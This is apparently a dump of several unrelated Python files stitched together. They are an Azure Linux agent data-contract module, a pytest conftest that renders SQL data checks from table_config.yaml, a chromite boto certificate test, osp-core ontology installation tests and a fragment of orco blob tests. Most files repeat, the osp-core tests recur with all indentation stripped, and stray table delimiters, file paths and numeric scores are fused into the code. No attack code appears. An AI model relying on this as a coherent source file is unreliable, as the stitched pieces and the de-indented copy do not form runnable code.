    """Marker base class for guest<->host data contract objects."""
    pass
class DataContractList(list):
    """List of contract items; item_cls builds elements in set_properties."""
    def __init__(self, item_cls):  # pylint: disable=W0231
        # Deliberately skips list.__init__: the list starts empty.
        self.item_cls = item_cls
def validate_param(name, val, expected_type):
    """Raise ProtocolError unless *val* is a non-None instance of *expected_type*."""
    if val is None:
        raise ProtocolError("{0} is None".format(name))
    if not isinstance(val, expected_type):
        message = ("{0} type should be {1} not {2}"
                   "").format(name, expected_type, type(val))
        raise ProtocolError(message)
def set_properties(name, obj, data):
    """Recursively copy *data* (parsed wire payload) onto *obj*.

    DataContract + dict: set each known attribute recursively; unknown
    keys are logged and skipped. DataContractList + list: build one
    item_cls instance per element. Anything else: return data as the
    leaf value. *name* is only used to build diagnostic paths.
    """
    if isinstance(obj, DataContract):  # pylint: disable=R1705
        validate_param("Property '{0}'".format(name), data, dict)
        for prob_name, prob_val in data.items():
            prob_full_name = "{0}.{1}".format(name, prob_name)
            try:
                prob = getattr(obj, prob_name)
            except AttributeError:
                # Host sent a field this contract version does not define.
                logger.warn("Unknown property: {0}", prob_full_name)
                continue
            prob = set_properties(prob_full_name, prob, prob_val)
            setattr(obj, prob_name, prob)
        return obj
    elif isinstance(obj, DataContractList):
        validate_param("List '{0}'".format(name), data, list)
        for item_data in data:
            item = obj.item_cls()
            item = set_properties(name, item, item_data)
            obj.append(item)
        return obj
    else:
        # Leaf: the wire value is used directly.
        return data
def get_properties(obj):
    """Inverse of set_properties: convert contract objects back into plain
    dicts/lists/values suitable for serialization.

    Fix: the final ``return obj`` carried a dataset-dump artifact
    ("| azurelinuxagent/common/datacontract.py |") fused onto it; removed.
    """
    if isinstance(obj, DataContract):  # pylint: disable=R1705
        data = {}
        props = vars(obj)
        for prob_name, prob in list(props.items()):
            data[prob_name] = get_properties(prob)
        return data
    elif isinstance(obj, DataContractList):
        data = []
        for item in obj:
            item_data = get_properties(item)
            data.append(item_data)
        return data
    else:
        return obj
from azurelinuxagent.common.exception import ProtocolError
import azurelinuxagent.common.logger as logger
# pylint: disable=W0105
"""
Base class for data contracts between guest and host and utilities to manipulate the properties in those contracts
"""
# pylint: enable=W0105
class DataContract(object):
    """Marker base class for guest<->host data contract objects."""
    pass
class DataContractList(list):
    """List of contract items; item_cls builds elements in set_properties."""
    def __init__(self, item_cls):  # pylint: disable=W0231
        # Deliberately skips list.__init__: the list starts empty.
        self.item_cls = item_cls
def validate_param(name, val, expected_type):
    """Raise ProtocolError unless *val* is a non-None instance of *expected_type*."""
    if val is None:
        raise ProtocolError("{0} is None".format(name))
    if not isinstance(val, expected_type):
        message = ("{0} type should be {1} not {2}"
                   "").format(name, expected_type, type(val))
        raise ProtocolError(message)
def set_properties(name, obj, data):
    """Recursively copy *data* (parsed wire payload) onto *obj*.

    DataContract + dict: set each known attribute recursively; unknown
    keys are logged and skipped. DataContractList + list: build one
    item_cls instance per element. Anything else: return data as the
    leaf value. *name* is only used to build diagnostic paths.
    """
    if isinstance(obj, DataContract):  # pylint: disable=R1705
        validate_param("Property '{0}'".format(name), data, dict)
        for prob_name, prob_val in data.items():
            prob_full_name = "{0}.{1}".format(name, prob_name)
            try:
                prob = getattr(obj, prob_name)
            except AttributeError:
                # Host sent a field this contract version does not define.
                logger.warn("Unknown property: {0}", prob_full_name)
                continue
            prob = set_properties(prob_full_name, prob, prob_val)
            setattr(obj, prob_name, prob)
        return obj
    elif isinstance(obj, DataContractList):
        validate_param("List '{0}'".format(name), data, list)
        for item_data in data:
            item = obj.item_cls()
            item = set_properties(name, item, item_data)
            obj.append(item)
        return obj
    else:
        # Leaf: the wire value is used directly.
        return data
def get_properties(obj):
    """Inverse of set_properties: convert contract objects back into plain
    dicts/lists/values suitable for serialization.

    Fix: the final ``return obj`` carried a dataset-dump artifact
    ("| 0.416797 | 0.319679") fused onto it; removed.
    """
    if isinstance(obj, DataContract):  # pylint: disable=R1705
        data = {}
        props = vars(obj)
        for prob_name, prob in list(props.items()):
            data[prob_name] = get_properties(prob)
        return data
    elif isinstance(obj, DataContractList):
        data = []
        for item in obj:
            item_data = get_properties(item)
            data.append(item_data)
        return data
    else:
        return obj
import csv
import json
import os
from pathlib import Path
import pytest
import yaml
from jinja2 import Template
# -------------------------------------
# Execute once at session start
# -------------------------------------
def omit_hints(data):
    """Set values encapsulated with <> to None in a dict (recursively).

    Strings are stripped; a string wrapped as <...> is a template hint and
    becomes None. Lists drop falsy results (hints and empty strings) and
    collapse to None when nothing survives. Dicts are rewritten in place.
    """
    if isinstance(data, str):
        is_hint = len(data) >= 2 and f"{data[0]}{data[-1]}" == "<>"
        return None if is_hint else data.strip()
    if isinstance(data, list):
        kept = list(filter(omit_hints, data))
        return kept if kept else None
    if isinstance(data, dict):
        for k in data.keys():
            data[k] = omit_hints(data[k])
        return data
    return data
def get_table_configs():
    """Load table_config.yaml files"""
    # files.json lists the changed files; a table_config.yaml is expected
    # in each file's folder.
    with open("files.json", "r") as file:
        files = json.load(file)
    folders = [Path(file).parent for file in files]
    files = [folder / "table_config.yaml" for folder in folders]
    # keep only configs that actually exist, deduplicated (order irrelevant)
    files = [file for file in files if file.exists()]
    files = list(set(files))
    return files
def filter_table_configs(config_paths: list[Path], skipfile: Path) -> list[Path]:
    """Filter table_config.yaml files not in DATA_CHECK_SKIP.csv"""
    with open(skipfile, "r") as file:
        skipped_datasets = [row[0] for row in csv.reader(file) if len(row) > 0]

    # keep a config only when its dataset folder is not listed in the skipfile
    def keep(path):
        return path.parent.parent.name not in skipped_datasets

    return [p for p in config_paths if keep(p)]
def pytest_addoption(parser):
    """Register the --skipfile CLI option (csv of datasets to ignore)."""
    parser.addoption(
        "--skipfile",
        action="store",
        default="",
        help="csv filepath with datasets to ignore",
    )
def pytest_configure(config):
    """Stash the parsed pytest options for use by later hooks."""
    global _options
    _options = config.option
def pytest_sessionstart(session):
    """Initialize session, loading table configs.

    Renders checks.yaml (a Jinja2 template) once per table_config.yaml
    into the module-global _configs list and resets report.json.
    """
    global _configs
    # set filepaths for checks and configs
    # change this line to "checks.yaml" for local debugging
    check_path = "./.github/workflows/data-check/checks.yaml"
    # replace this line with a list of table_config.yaml paths for local debugging
    config_paths = get_table_configs()
    # filter datasets if skipfile is activated
    if _options.skipfile:
        skipfile = Path(_options.skipfile)
        config_paths = filter_table_configs(config_paths, skipfile)
    # exit if it has no fixtures
    if not config_paths:
        pytest.exit("No fixtures found", 0)
    # load checks with jinja2 placeholders
    # and replace the project variable by the
    # production environment if it's table approve action
    with open(check_path, "r", encoding="utf-8") as file:
        skeleton = file.read()
    if os.environ.get("IS_PROD_ENV", False):
        skeleton = skeleton.replace("{{ project_id }}", "basedosdados")
    else:
        skeleton = skeleton.replace("{{ project_id }}", "{{ project_id_prod }}")
    checks = Template(skeleton)
    # load checks with configs from table_config.yaml
    _configs = []
    for cpath in config_paths:
        with open(cpath, "r") as file:
            # load configs, a.k.a. table_config.yaml
            config = yaml.safe_load(file)
            config = omit_hints(config)
            # render jinja2 checks with config definitions
            config = checks.render(**config)
            config = yaml.safe_load(config)
            # save configs
            _configs.append(config)
    # create empty json report
    with open("./report.json", "w") as file:
        file.write("{}")
# -------------------------------------
# Execute once after session start
# -------------------------------------
def pytest_generate_tests(metafunc):
    """Link one fixture (table_config.yaml) to one test suite"""
    # every test function runs once per config loaded at session start
    metafunc.parametrize("configs", _configs)
# -------------------------------------
# Execute once after each test
# -------------------------------------
@pytest.hookimpl(tryfirst=True, hookwrapper=True)
def pytest_runtest_makereport(item, call):
    """Add test status for each test in report.json"""
    outcome = yield  # let pytest build the report first
    res = outcome.get_result()
    # only record the actual test call phase (not setup/teardown)
    if res.when == "call":
        with open("./report.json", "r") as file:
            # the parametrized config carries its own id under the test name
            config_id = item.funcargs["configs"]
            config_id = config_id[item.originalname]
            config_id = config_id["id"]
            data = json.load(file)
            data[config_id]["passed"] = not res.failed
        with open("./report.json", "w") as file:
            json.dump(data, file)
# -------------------------------------
# Execute once at session finish
# -------------------------------------
def pytest_sessionfinish(session, exitstatus):
    """Report overall test status in markdown"""
    with open("./report.json", "r") as file:
        data = json.load(file)
    data = [v for _, v in data.items()]
    data = sorted(data, key=lambda x: x["id"])
    # ids look like "<dataset>.<table>/<check index>"; n is the last index
    n = [datum["id"].split("/")[-1] for datum in data]
    n = max(int(ni) for ni in n)
    with open("./report.md", "w") as file:
        file.write("Data Check Report\n---\n\n")
        for datum in data:
            # index 0 opens a new table section
            if int(datum["id"].split("/")[-1]) == 0:
                file.write(f" Table `{datum['id'][:-2]}` \n\n")
            if datum["passed"]:
                file.write(f"✔️ {datum['name']} \n\n")
            else:
                # failed checks include the offending SQL for debugging
                file.write(f"❌ {datum['name']} \n\n")
                file.write(f"```sql \n")
                file.write(f"{datum['query']}")
                file.write(f"``` \n\n")
            # the last index closes the section
            if int(datum["id"].split("/")[-1]) == n:
                file.write("---\n\n")
# -------------------------------------
# Reference
# https://docs.pytest.org/en/6.2.x/contents.html
# -------------------------------------
import csv
import json
import os
from pathlib import Path
import pytest
import yaml
from jinja2 import Template
# -------------------------------------
# Execute once at session start
# -------------------------------------
def omit_hints(data):
    """Set values encapsulated with <> to None in a dict (recursively).

    Strings are stripped; a string wrapped as <...> is a template hint and
    becomes None. Lists drop falsy results (hints and empty strings) and
    collapse to None when nothing survives. Dicts are rewritten in place.
    """
    if isinstance(data, str):
        is_hint = len(data) >= 2 and f"{data[0]}{data[-1]}" == "<>"
        return None if is_hint else data.strip()
    if isinstance(data, list):
        kept = list(filter(omit_hints, data))
        return kept if kept else None
    if isinstance(data, dict):
        for k in data.keys():
            data[k] = omit_hints(data[k])
        return data
    return data
def get_table_configs():
    """Load table_config.yaml files"""
    # files.json lists the changed files; a table_config.yaml is expected
    # in each file's folder.
    with open("files.json", "r") as file:
        files = json.load(file)
    folders = [Path(file).parent for file in files]
    files = [folder / "table_config.yaml" for folder in folders]
    # keep only configs that actually exist, deduplicated (order irrelevant)
    files = [file for file in files if file.exists()]
    files = list(set(files))
    return files
def filter_table_configs(config_paths: list[Path], skipfile: Path) -> list[Path]:
    """Filter table_config.yaml files not in DATA_CHECK_SKIP.csv"""
    with open(skipfile, "r") as file:
        skipped_datasets = [row[0] for row in csv.reader(file) if len(row) > 0]

    # keep a config only when its dataset folder is not listed in the skipfile
    def keep(path):
        return path.parent.parent.name not in skipped_datasets

    return [p for p in config_paths if keep(p)]
def pytest_addoption(parser):
    """Register the --skipfile CLI option (csv of datasets to ignore)."""
    parser.addoption(
        "--skipfile",
        action="store",
        default="",
        help="csv filepath with datasets to ignore",
    )
def pytest_configure(config):
    """Stash the parsed pytest options for use by later hooks."""
    global _options
    _options = config.option
def pytest_sessionstart(session):
    """Initialize session, loading table configs.

    Renders checks.yaml (a Jinja2 template) once per table_config.yaml
    into the module-global _configs list and resets report.json.
    """
    global _configs
    # set filepaths for checks and configs
    # change this line to "checks.yaml" for local debugging
    check_path = "./.github/workflows/data-check/checks.yaml"
    # replace this line with a list of table_config.yaml paths for local debugging
    config_paths = get_table_configs()
    # filter datasets if skipfile is activated
    if _options.skipfile:
        skipfile = Path(_options.skipfile)
        config_paths = filter_table_configs(config_paths, skipfile)
    # exit if it has no fixtures
    if not config_paths:
        pytest.exit("No fixtures found", 0)
    # load checks with jinja2 placeholders
    # and replace the project variable by the
    # production environment if it's table approve action
    with open(check_path, "r", encoding="utf-8") as file:
        skeleton = file.read()
    if os.environ.get("IS_PROD_ENV", False):
        skeleton = skeleton.replace("{{ project_id }}", "basedosdados")
    else:
        skeleton = skeleton.replace("{{ project_id }}", "{{ project_id_prod }}")
    checks = Template(skeleton)
    # load checks with configs from table_config.yaml
    _configs = []
    for cpath in config_paths:
        with open(cpath, "r") as file:
            # load configs, a.k.a. table_config.yaml
            config = yaml.safe_load(file)
            config = omit_hints(config)
            # render jinja2 checks with config definitions
            config = checks.render(**config)
            config = yaml.safe_load(config)
            # save configs
            _configs.append(config)
    # create empty json report
    with open("./report.json", "w") as file:
        file.write("{}")
# -------------------------------------
# Execute once after session start
# -------------------------------------
def pytest_generate_tests(metafunc):
    """Link one fixture (table_config.yaml) to one test suite"""
    # every test function runs once per config loaded at session start
    metafunc.parametrize("configs", _configs)
# -------------------------------------
# Execute once after each test
# -------------------------------------
@pytest.hookimpl(tryfirst=True, hookwrapper=True)
def pytest_runtest_makereport(item, call):
    """Add test status for each test in report.json"""
    outcome = yield  # let pytest build the report first
    res = outcome.get_result()
    # only record the actual test call phase (not setup/teardown)
    if res.when == "call":
        with open("./report.json", "r") as file:
            # the parametrized config carries its own id under the test name
            config_id = item.funcargs["configs"]
            config_id = config_id[item.originalname]
            config_id = config_id["id"]
            data = json.load(file)
            data[config_id]["passed"] = not res.failed
        with open("./report.json", "w") as file:
            json.dump(data, file)
# -------------------------------------
# Execute once at session finish
# -------------------------------------
def pytest_sessionfinish(session, exitstatus):
    """Report overall test status in markdown"""
    with open("./report.json", "r") as file:
        data = json.load(file)
    data = [v for _, v in data.items()]
    data = sorted(data, key=lambda x: x["id"])
    # ids look like "<dataset>.<table>/<check index>"; n is the last index
    n = [datum["id"].split("/")[-1] for datum in data]
    n = max(int(ni) for ni in n)
    with open("./report.md", "w") as file:
        file.write("Data Check Report\n---\n\n")
        for datum in data:
            # index 0 opens a new table section
            if int(datum["id"].split("/")[-1]) == 0:
                file.write(f" Table `{datum['id'][:-2]}` \n\n")
            if datum["passed"]:
                file.write(f"✔️ {datum['name']} \n\n")
            else:
                # failed checks include the offending SQL for debugging
                file.write(f"❌ {datum['name']} \n\n")
                file.write(f"```sql \n")
                file.write(f"{datum['query']}")
                file.write(f"``` \n\n")
            # the last index closes the section
            if int(datum["id"].split("/")[-1]) == n:
                file.write("---\n\n")
# -------------------------------------
# Reference
# https://docs.pytest.org/en/6.2.x/contents.html
# -------------------------------------
from __future__ import print_function
import os
import sys
from six.moves import configparser
from chromite.lib import boto_compat
from chromite.lib import cros_test_lib
from chromite.lib import osutils
# Fail fast on unsupported interpreters before any test code runs.
assert sys.version_info >= (3, 6), 'This module requires Python 3.6+'
class FixBotoCertsTest(cros_test_lib.TempDirTestCase):
    """Tests FixBotoCerts functionality.

    Fix: the final assertion carried a dataset-dump artifact
    ("| lib/boto_compat_unittest.py | ...") fused onto it; removed.
    """

    def testCaFix(self):
        """Inside the context a generated config points at a real CA bundle."""
        os.environ['BOTO_CONFIG'] = os.path.join(self.tempdir, 'fake')
        with boto_compat.FixBotoCerts(strict=True):
            boto_config = os.environ['BOTO_CONFIG']
            self.assertExists(boto_config)
            config = configparser.SafeConfigParser()
            config.read(boto_config)
            cafile = config.get('Boto', 'ca_certificates_file')
            self.assertExists(cafile)
        # The generated config file is cleaned up on exit.
        self.assertNotExists(boto_config)

    def testMergeBotoConfig(self):
        """Existing BOTO_CONFIG contents are merged, not discarded."""
        boto_config = os.path.join(self.tempdir, 'boto.cfg')
        osutils.WriteFile(boto_config, '[S]\nk = v')
        os.environ['BOTO_CONFIG'] = boto_config
        with boto_compat.FixBotoCerts(strict=True):
            config = configparser.SafeConfigParser()
            config.read(os.environ['BOTO_CONFIG'])
            self.assertEqual(config.get('S', 'k'), 'v')
            self.assertTrue(config.has_option('Boto', 'ca_certificates_file'))
        # Original env var is restored after the context exits.
        self.assertEqual(os.environ['BOTO_CONFIG'], boto_config)

    def testMergeBotoPath(self):
        """Later BOTO_PATH entries override earlier ones in the merge."""
        cfgfile1 = os.path.join(self.tempdir, 'boto1.cfg')
        osutils.WriteFile(cfgfile1, '[S]\nk = v\nk2 = v1')
        cfgfile2 = os.path.join(self.tempdir, 'boto2.cfg')
        osutils.WriteFile(cfgfile2, '[S]\nk2 = v2')
        os.environ['BOTO_PATH'] = boto_path = '%s:%s' % (cfgfile1, cfgfile2)
        with boto_compat.FixBotoCerts(strict=True):
            config = configparser.SafeConfigParser()
            config.read(os.environ['BOTO_CONFIG'])
            self.assertEqual(config.get('S', 'k'), 'v')
            self.assertEqual(config.get('S', 'k2'), 'v2')
            self.assertTrue(config.has_option('Boto', 'ca_certificates_file'))
        self.assertEqual(os.environ['BOTO_PATH'], boto_path)

    def testActivateFalse(self):
        """activate=False leaves the environment untouched."""
        os.environ.pop('BOTO_CONFIG', None)
        with boto_compat.FixBotoCerts(strict=True, activate=False):
            self.assertNotIn('BOTO_CONFIG', os.environ)
import os
import sys
from six.moves import configparser
from chromite.lib import boto_compat
from chromite.lib import cros_test_lib
from chromite.lib import osutils
# Fail fast on unsupported interpreters before any test code runs.
assert sys.version_info >= (3, 6), 'This module requires Python 3.6+'
class FixBotoCertsTest(cros_test_lib.TempDirTestCase):
    """Tests FixBotoCerts functionality.

    Fix: the final assertion carried a dataset-dump artifact
    ("| 0.400163 | 0.201695 |") fused onto it; removed.
    """

    def testCaFix(self):
        """Inside the context a generated config points at a real CA bundle."""
        os.environ['BOTO_CONFIG'] = os.path.join(self.tempdir, 'fake')
        with boto_compat.FixBotoCerts(strict=True):
            boto_config = os.environ['BOTO_CONFIG']
            self.assertExists(boto_config)
            config = configparser.SafeConfigParser()
            config.read(boto_config)
            cafile = config.get('Boto', 'ca_certificates_file')
            self.assertExists(cafile)
        # The generated config file is cleaned up on exit.
        self.assertNotExists(boto_config)

    def testMergeBotoConfig(self):
        """Existing BOTO_CONFIG contents are merged, not discarded."""
        boto_config = os.path.join(self.tempdir, 'boto.cfg')
        osutils.WriteFile(boto_config, '[S]\nk = v')
        os.environ['BOTO_CONFIG'] = boto_config
        with boto_compat.FixBotoCerts(strict=True):
            config = configparser.SafeConfigParser()
            config.read(os.environ['BOTO_CONFIG'])
            self.assertEqual(config.get('S', 'k'), 'v')
            self.assertTrue(config.has_option('Boto', 'ca_certificates_file'))
        # Original env var is restored after the context exits.
        self.assertEqual(os.environ['BOTO_CONFIG'], boto_config)

    def testMergeBotoPath(self):
        """Later BOTO_PATH entries override earlier ones in the merge."""
        cfgfile1 = os.path.join(self.tempdir, 'boto1.cfg')
        osutils.WriteFile(cfgfile1, '[S]\nk = v\nk2 = v1')
        cfgfile2 = os.path.join(self.tempdir, 'boto2.cfg')
        osutils.WriteFile(cfgfile2, '[S]\nk2 = v2')
        os.environ['BOTO_PATH'] = boto_path = '%s:%s' % (cfgfile1, cfgfile2)
        with boto_compat.FixBotoCerts(strict=True):
            config = configparser.SafeConfigParser()
            config.read(os.environ['BOTO_CONFIG'])
            self.assertEqual(config.get('S', 'k'), 'v')
            self.assertEqual(config.get('S', 'k2'), 'v2')
            self.assertTrue(config.has_option('Boto', 'ca_certificates_file'))
        self.assertEqual(os.environ['BOTO_PATH'], boto_path)

    def testActivateFalse(self):
        """activate=False leaves the environment untouched."""
        os.environ.pop('BOTO_CONFIG', None)
        with boto_compat.FixBotoCerts(strict=True, activate=False):
            self.assertNotIn('BOTO_CONFIG', os.environ)
import os
import unittest2 as unittest
import tempfile
import rdflib
import shutil
from osp.core.ontology.installation import OntologyInstallationManager, \
pico_migrate
from osp.core.ontology.namespace_registry import NamespaceRegistry
# Ontology fixture files: the local parser-test YAML next to this test, and
# the city ontology bundled with osp-core.
FILES = [
    os.path.join(os.path.dirname(os.path.abspath(__file__)),
                 "parser_test.yml"),
    os.path.join(os.path.dirname(os.path.abspath(__file__)),
                 "..", "osp", "core", "ontology", "docs", "city.ontology.yml"),
]
class TestInstallation(unittest.TestCase):
    def setUp(self):
        """Create a fresh temp dir, registry and installer for each test."""
        self.tempdir = tempfile.TemporaryDirectory()
        self.namespace_registry = NamespaceRegistry()
        # Preload the built-in cuba namespace the installer depends on.
        self.namespace_registry._load_cuba()
        self.installer = OntologyInstallationManager(
            namespace_registry=self.namespace_registry,
            path=self.tempdir.name
        )
    def tearDown(self):
        """Remove the per-test temp directory."""
        self.tempdir.cleanup()
    def copy_files(self):
        """Copy both fixture YAML files into the temp dir; return the copies."""
        p1 = os.path.join(self.tempdir.name, os.path.basename(FILES[0]))
        p2 = os.path.join(self.tempdir.name, os.path.basename(FILES[1]))
        shutil.copyfile(FILES[0], p1)
        shutil.copyfile(FILES[1], p2)
        return p1, p2
    def test_do_install(self):
        """_install merges new files (clear=False) and resets (clear=True)."""
        # clear False; the filter callable drops the trailing "invalid" entry
        self.installer._install(FILES + ["invalid"], lambda x: x[:-1],
                                clear=False)
        self.assertIn("city", self.namespace_registry._namespaces)
        self.assertIn("parser_test", self.namespace_registry._namespaces)
        self.assertEqual(self.namespace_registry._namespaces["city"],
                         rdflib.term.URIRef('http://www.osp-core.com/city#'))
        self.assertEqual(
            self.namespace_registry._namespaces["parser_test"],
            rdflib.term.URIRef('http://www.osp-core.com/parser_test#'))
        self.assertEqual(sorted(os.listdir(self.tempdir.name)), sorted([
            'city.yml', 'graph.xml', 'namespaces.txt', 'parser_test.xml',
            'parser_test.yml']))
        with open(os.path.join(self.tempdir.name, "namespaces.txt")) as f:
            lines = set(map(lambda x: x.strip(), f))
            self.assertIn("city\thttp://www.osp-core.com/city#", lines)
            self.assertIn("cuba\thttp://www.osp-core.com/cuba#", lines)
            self.assertIn("parser_test\thttp://www.osp-core.com/parser_test#",
                          lines)
        g_old = self.namespace_registry._graph
        # clear True: reinstalling only parser_test drops the city namespace
        # (the original comment said "clear False" — the call uses clear=True)
        self.installer._install([FILES[0]], lambda x: x, clear=True)
        self.assertNotIn("city", self.namespace_registry._namespaces)
        self.assertIn("parser_test", self.namespace_registry._namespaces)
        # clearing rebuilds the graph object
        self.assertIsNot(g_old, self.namespace_registry._graph)
        self.assertEqual(
            self.namespace_registry._namespaces["parser_test"],
            rdflib.term.URIRef('http://www.osp-core.com/parser_test#'))
        self.assertEqual(sorted(os.listdir(self.tempdir.name)), sorted([
            'graph.xml', 'namespaces.txt', 'parser_test.xml',
            'parser_test.yml']))
        with open(os.path.join(self.tempdir.name, "namespaces.txt")) as f:
            lines = set(map(lambda x: x.strip(), f))
            self.assertNotIn("city\thttp://www.osp-core.com/city#", lines)
            self.assertIn("cuba\thttp://www.osp-core.com/cuba#", lines)
            self.assertIn("parser_test\thttp://www.osp-core.com/parser_test#",
                          lines)
def test_get_new_packages(self):
o1, o2 = self.copy_files()
self.assertEqual(self.installer._get_new_packages(FILES), set())
os.remove(o1)
self.assertEqual(self.installer._get_new_packages(FILES), {FILES[0]})
def test_get_replaced_packages(self):
o1, o2 = self.copy_files()
self.assertEqual(
set(self.installer._get_replaced_packages([FILES[0]])),
{FILES[0], o2}
)
self.assertRaises(FileNotFoundError,
self.installer._get_replaced_packages, ["invalid"])
def test_get_remaining_packages(self):
o1, o2 = self.copy_files()
self.assertRaises(
ValueError, self.installer._get_remaining_packages,
["city", "invalid"]
)
self.assertRaises(
ValueError, self.installer._get_remaining_packages, ["city.yml"]
)
self.assertEqual(self.installer._get_remaining_packages(FILES), [])
self.assertEqual(self.installer._get_remaining_packages([FILES[0]]),
[o2])
self.assertEqual(self.installer._get_remaining_packages([o2]),
[o1])
os.remove(o2)
self.assertRaises(ValueError, self.installer._get_remaining_packages,
FILES)
def test_get_installed_packages(self):
o1, o2 = self.copy_files()
open(os.path.join(self.tempdir.name, "o3.xml"), "w").close()
self.assertEqual(self.installer.get_installed_packages(),
{"city", "parser_test"})
self.assertEqual(self.installer.get_installed_packages(True),
{("city", o2), ("parser_test", o1)})
def test_sort_for_installation(self):
r = self.installer._sort_for_installation(
["city", "parser_test"], set())
self.assertEqual(r, ["city", "parser_test"])
r = self.installer._sort_for_installation(
["parser_test", "city"], set())
self.assertEqual(r, ["city", "parser_test"])
self.assertRaises(RuntimeError, self.installer._sort_for_installation,
["parser_test"], set())
def test_pico_migrate(self):
path = os.path.join(self.tempdir.name, ".osp_ontologies")
yml_dir = os.path.join(path, "yml", "installed")
os.makedirs(os.path.join(path, "yml", "installed"))
file = FILES[1]
dest = os.path.join(yml_dir, os.path.basename(file))
shutil.copyfile(file, dest)
pkl_file = os.path.join(path, "foo.bar.pkl")
open(pkl_file, "wb").close()
self.installer.namespace_registry._graph = rdflib.Graph()
pico_migrate(self.installer.namespace_registry,
path)
self.assertEqual(sorted(os.listdir(path)), sorted([
'city.yml', 'graph.xml', 'namespaces.txt']))
if __name__ == "__main__":
unittest.main() | tests/test_installation.py | import os
import unittest2 as unittest
import tempfile
import rdflib
import shutil
from osp.core.ontology.installation import OntologyInstallationManager, \
pico_migrate
from osp.core.ontology.namespace_registry import NamespaceRegistry
FILES = [
os.path.join(os.path.dirname(os.path.abspath(__file__)),
"parser_test.yml"),
os.path.join(os.path.dirname(os.path.abspath(__file__)),
"..", "osp", "core", "ontology", "docs", "city.ontology.yml"),
]
class TestInstallation(unittest.TestCase):
def setUp(self):
self.tempdir = tempfile.TemporaryDirectory()
self.namespace_registry = NamespaceRegistry()
self.namespace_registry._load_cuba()
self.installer = OntologyInstallationManager(
namespace_registry=self.namespace_registry,
path=self.tempdir.name
)
def tearDown(self):
self.tempdir.cleanup()
def copy_files(self):
p1 = os.path.join(self.tempdir.name, os.path.basename(FILES[0]))
p2 = os.path.join(self.tempdir.name, os.path.basename(FILES[1]))
shutil.copyfile(FILES[0], p1)
shutil.copyfile(FILES[1], p2)
return p1, p2
def test_do_install(self):
# clear False
self.installer._install(FILES + ["invalid"], lambda x: x[:-1],
clear=False)
self.assertIn("city", self.namespace_registry._namespaces)
self.assertIn("parser_test", self.namespace_registry._namespaces)
self.assertEqual(self.namespace_registry._namespaces["city"],
rdflib.term.URIRef('http://www.osp-core.com/city#'))
self.assertEqual(
self.namespace_registry._namespaces["parser_test"],
rdflib.term.URIRef('http://www.osp-core.com/parser_test#'))
self.assertEqual(sorted(os.listdir(self.tempdir.name)), sorted([
'city.yml', 'graph.xml', 'namespaces.txt', 'parser_test.xml',
'parser_test.yml']))
with open(os.path.join(self.tempdir.name, "namespaces.txt")) as f:
lines = set(map(lambda x: x.strip(), f))
self.assertIn("city\thttp://www.osp-core.com/city#", lines)
self.assertIn("cuba\thttp://www.osp-core.com/cuba#", lines)
self.assertIn("parser_test\thttp://www.osp-core.com/parser_test#",
lines)
g_old = self.namespace_registry._graph
# clear False
self.installer._install([FILES[0]], lambda x: x, clear=True)
self.assertNotIn("city", self.namespace_registry._namespaces)
self.assertIn("parser_test", self.namespace_registry._namespaces)
self.assertIsNot(g_old, self.namespace_registry._graph)
self.assertEqual(
self.namespace_registry._namespaces["parser_test"],
rdflib.term.URIRef('http://www.osp-core.com/parser_test#'))
self.assertEqual(sorted(os.listdir(self.tempdir.name)), sorted([
'graph.xml', 'namespaces.txt', 'parser_test.xml',
'parser_test.yml']))
with open(os.path.join(self.tempdir.name, "namespaces.txt")) as f:
lines = set(map(lambda x: x.strip(), f))
self.assertNotIn("city\thttp://www.osp-core.com/city#", lines)
self.assertIn("cuba\thttp://www.osp-core.com/cuba#", lines)
self.assertIn("parser_test\thttp://www.osp-core.com/parser_test#",
lines)
def test_get_new_packages(self):
o1, o2 = self.copy_files()
self.assertEqual(self.installer._get_new_packages(FILES), set())
os.remove(o1)
self.assertEqual(self.installer._get_new_packages(FILES), {FILES[0]})
def test_get_replaced_packages(self):
o1, o2 = self.copy_files()
self.assertEqual(
set(self.installer._get_replaced_packages([FILES[0]])),
{FILES[0], o2}
)
self.assertRaises(FileNotFoundError,
self.installer._get_replaced_packages, ["invalid"])
def test_get_remaining_packages(self):
o1, o2 = self.copy_files()
self.assertRaises(
ValueError, self.installer._get_remaining_packages,
["city", "invalid"]
)
self.assertRaises(
ValueError, self.installer._get_remaining_packages, ["city.yml"]
)
self.assertEqual(self.installer._get_remaining_packages(FILES), [])
self.assertEqual(self.installer._get_remaining_packages([FILES[0]]),
[o2])
self.assertEqual(self.installer._get_remaining_packages([o2]),
[o1])
os.remove(o2)
self.assertRaises(ValueError, self.installer._get_remaining_packages,
FILES)
def test_get_installed_packages(self):
o1, o2 = self.copy_files()
open(os.path.join(self.tempdir.name, "o3.xml"), "w").close()
self.assertEqual(self.installer.get_installed_packages(),
{"city", "parser_test"})
self.assertEqual(self.installer.get_installed_packages(True),
{("city", o2), ("parser_test", o1)})
def test_sort_for_installation(self):
r = self.installer._sort_for_installation(
["city", "parser_test"], set())
self.assertEqual(r, ["city", "parser_test"])
r = self.installer._sort_for_installation(
["parser_test", "city"], set())
self.assertEqual(r, ["city", "parser_test"])
self.assertRaises(RuntimeError, self.installer._sort_for_installation,
["parser_test"], set())
def test_pico_migrate(self):
path = os.path.join(self.tempdir.name, ".osp_ontologies")
yml_dir = os.path.join(path, "yml", "installed")
os.makedirs(os.path.join(path, "yml", "installed"))
file = FILES[1]
dest = os.path.join(yml_dir, os.path.basename(file))
shutil.copyfile(file, dest)
pkl_file = os.path.join(path, "foo.bar.pkl")
open(pkl_file, "wb").close()
self.installer.namespace_registry._graph = rdflib.Graph()
pico_migrate(self.installer.namespace_registry,
path)
self.assertEqual(sorted(os.listdir(path)), sorted([
'city.yml', 'graph.xml', 'namespaces.txt']))
if __name__ == "__main__":
unittest.main() | 0.378459 | 0.462655 |
import os
import pytest
from orco import builder, attach_object, attach_file, attach_directory, attach_text
def test_blob_validate_name(env):
@builder()
def bb(x):
with pytest.raises(Exception, match="has to be a string"):
attach_object(123, 1)
with pytest.raises(Exception, match="non-empty"):
attach_object("", 2)
with pytest.raises(Exception, match="cannot start with"):
attach_object("!hello", 3)
return "Ok"
runtime = env.test_runtime()
a = runtime.compute(bb(x=20))
assert a.value == "Ok"
def test_blob_attach_object(env):
@builder()
def bb(x):
attach_object("object", x * 100)
with pytest.raises(Exception, match="already exists"):
attach_object("object", x * 101)
attach_object("a-object", x)
@builder()
def cc(x):
b = bb(x)
with pytest.raises(Exception, match="not attached"):
b.get_object("xxx")
with pytest.raises(Exception, match="attach_object"):
attach_object("object", None)
yield
assert ["a-object", "object"] == b.get_names()
